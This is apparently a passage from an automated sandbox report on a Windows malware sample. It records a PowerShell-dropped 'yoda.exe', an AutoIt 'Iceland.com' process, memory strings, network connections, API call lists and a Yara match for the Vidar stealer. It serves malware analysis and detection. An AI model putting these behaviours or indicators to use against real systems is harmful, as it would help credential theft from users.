Source: Iceland.com, 00000015.00000002.3335415004.00000000017C0000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3341880599.000000000433D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: Iceland.com, 00000015.00000002.3338270590.0000000004097000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3338924888.0000000004205000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Tracking.11.dr, Iceland.com.12.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Iceland.com, 00000015.00000002.3338270590.0000000004097000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3338924888.0000000004205000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000018.00000002.2728509553.000054DC00C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000018.00000002.2728509553.000054DC00C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000018.00000002.2728509553.000054DC00C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: Tracking.11.dr, Iceland.com.12.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000018.00000003.2665397193.000054DC00ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000018.00000003.2665397193.000054DC00ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000018.00000002.2723677359.000054DC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724816600.000054DC00860000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2726425245.000054DC00AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723195719.000054DC0055C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000018.00000002.2724816600.000054DC00860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/CharPk3
Source: chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2T
Source: chrome.exe, 00000018.00000002.2721408724.000054DC00080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_
Source: chrome.exe, 00000018.00000002.2721408724.000054DC00080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_b?f
Source: chrome.exe, 00000018.00000002.2733305256.000054DC01198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724923196.000054DC008B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725502521.000054DC009AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724923196.000054DC008B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725502521.000054DC009AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: Iceland.com, 00000015.00000002.3338924888.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723167042.000054DC00544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723450719.000054DC0061C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr, Web Data.37.dr, GVS0HV.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoceType)T
Source: chrome.exe, 00000018.00000002.2722915743.000054DC0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit_AutofillEnableIbanClientSideUrlFiltering
Source: chrome.exe, 00000018.00000002.2726425245.000054DC00AA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000018.00000003.2665397193.000054DC00ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/T
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000018.00000003.2680386737.000054DC024F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000018.00000002.2741401296.000054DC02B34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000018.00000003.2687257476.000054DC00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2687378044.000054DC02BA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686600595.000054DC02B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686706811.000054DC02B90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2687287801.000054DC02AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2741401296.000054DC02B34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 00000018.00000002.2729235814.000054DC00D18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729996442.000054DC00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724139396.000054DC00730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000018.00000002.2724139396.000054DC00730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaoglT
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlbag
Source: chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.5:49758 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

Code function: 11_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

11_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0098F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

21_2_0098F7C7

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0098F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

21_2_0098F55C

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

Code function: 11_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

11_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_009A9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

21_2_009A9FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.Iceland.com.42f0000.1.unpack, type: UNPACKEDPE

Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\yoda.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0092FFE0 CloseHandle,NtProtectVirtualMemory,

21_2_0092FFE0

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_00984763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

21_2_00984763

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_00971B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

21_2_00971B4D

Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		11_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0097F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		21_2_0097F20D

Source: C:\Users\user\AppData\Local\Temp\yoda.exe	File created: C:\Windows\PerformerNextel	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	File created: C:\Windows\ConsequenceCoalition	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	File created: C:\Windows\PhilipsFavors	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_0040737E	11_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_00406EFE	11_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_004079A2	11_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Code function: 11_2_004049A8	11_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00938017	21_2_00938017
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0091E1F0	21_2_0091E1F0
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_0092E144	21_2_0092E144
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_009322A2	21_2_009322A2
